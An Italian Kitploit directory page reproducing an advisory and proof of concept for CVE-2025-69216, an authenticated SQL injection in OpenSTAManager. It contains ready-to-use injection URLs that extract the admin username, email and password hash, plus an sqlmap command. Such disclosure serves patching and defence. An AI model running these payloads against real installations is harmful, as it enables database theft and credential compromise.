Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-69216 — Repository proof-of-concept per CVE-2025-69216, una SQL injection autenticata nel template di stampa Scadenzario di OpenSTAManager, che consente l'estrazione delle credenziali admin e dei contenuti del database tramite SQLi basata su errori e blind. | Kitploit
Strumenti/GitHubGitHub/lukasz-rybak/cve-2025-69216
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSicurezza dei Database
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

Repository proof-of-concept per CVE-2025-69216, una SQL injection autenticata nel template di stampa Scadenzario di OpenSTAManager, che consente l'estrazione delle credenziali admin e dei contenuti del database tramite SQLi basata su errori e blind.

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-69216: OpenSTAManager presenta una SQL Injection nel template di stampa Scadenzario

Panoramica

CampoDettagli
CVE IDCVE-2025-69216
GravitàALTA
AdvisoryVisualizza Advisory
Scoperto daLukasz Rybak

Prodotti Coinvolti

  • devcode-it/openstamanager (versioni: <= 2.9.8)

Classificazione CWE

  • CWE-89: Neutralizzazione impropria degli elementi speciali usati in un comando SQL ('SQL Injection')

Dettagli

Riepilogo

Una vulnerabilità di SQL injection autenticata nel template di stampa Scadenzario (piano dei pagamenti) di OpenSTAManager consente a qualsiasi utente autenticato di estrarre dati sensibili dal database, incluse le credenziali dell'admin, le informazioni sui clienti e i registri finanziari. La vulnerabilità consente l'accesso completo in lettura al database tramite tecniche di SQL injection basate su errori.

Dettagli

La vulnerabilità è presente in templates/scadenzario/init.php alla riga 46, dove il parametro id_anagrafica viene concatenato direttamente in una query SQL senza una corretta sanitizzazione:

Codice vulnerabile:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

La funzione get() recupera l'input utente dai parametri GET/POST senza validazione. Il valore del parametro viene incorporato direttamente nella stringa della query SQL tramite concatenazione di stringhe invece di utilizzare la funzione prepare() dell'applicazione per la sanitizzazione, consentendo attacchi di SQL injection.

Causa principale:

  • Mancato utilizzo della funzione prepare() per la sanitizzazione dell'input
  • Concatenazione diretta di stringhe nella costruzione della query SQL
  • Nessuna validazione dell'input o controllo del tipo

Endpoint interessato:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

File interessati:

  • templates/scadenzario/init.php (riga 46) - Vulnerabilità principale
  • templates/scadenzario/init.php (righe 34, 40) - Modello simile con i parametri delle date
  • pdfgen.php - Punto di ingresso per il rendering dei template

PoC (Proof of Concept)

Prerequisiti

  • Sessione autenticata valida (qualsiasi ruolo utente)

Passaggi di sfruttamento

1. Conferma della vulnerabilità - Test di errore di sintassi di base:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

Errore di sintassi SQL mostrato nella risposta dell'applicazione

immagine

2. Estrazione della versione del database - SQLi basata su errori:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Risultato: ~8.3.0~ (versione MySQL)

immagine

3. Estrazione del nome del database:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Risultato: ~openstamanager~

immagine

4. Estrazione del nome utente admin:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Risultato: ~admin~ immagine


5. Estrazione dell'email dell'admin:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Risultato: Indirizzo email dell'admin

immagine

6. Estrazione dell'hash della password (parziale - limite di 31 caratteri di XPATH):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Risultato: hash della password bcrypt

immagine

7. Sfruttamento automatizzato con SQLMap:

Creare il file di richiesta sqli_osm.req:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

Eseguire SQLMap:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

Tipi di iniezione confermati da SQLMap:

  • ✅ Iniezione SQL cieca basata su booleani
  • ✅ Iniezione SQL basata su errori (MySQL >= 5.6 GTID_SUBSET)
  • ✅ Iniezione SQL cieca basata sul tempo (SLEEP)
immagine

Impatto

Chi è colpito:

  • ✅ Tutti gli utenti autenticati - Qualsiasi utente con credenziali valide può sfruttare questa vulnerabilità
  • ✅ Utenti con privilegi minimi - Anche gli utenti con permessi minimi possono accedere a dati di livello admin
  • ✅ Tutte le installazioni di OpenSTAManager - La vulnerabilità è presente nell'ultimo ramo master

Attribuzione

Segnalata da Łukasz Rybak

Riferimenti

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

Disclaimer

Questa CVE è stata divulgata in modo responsabile seguendo le pratiche di divulgazione coordinata delle vulnerabilità. Le informazioni fornite qui hanno solo scopo educativo e difensivo.

Scarica lo strumento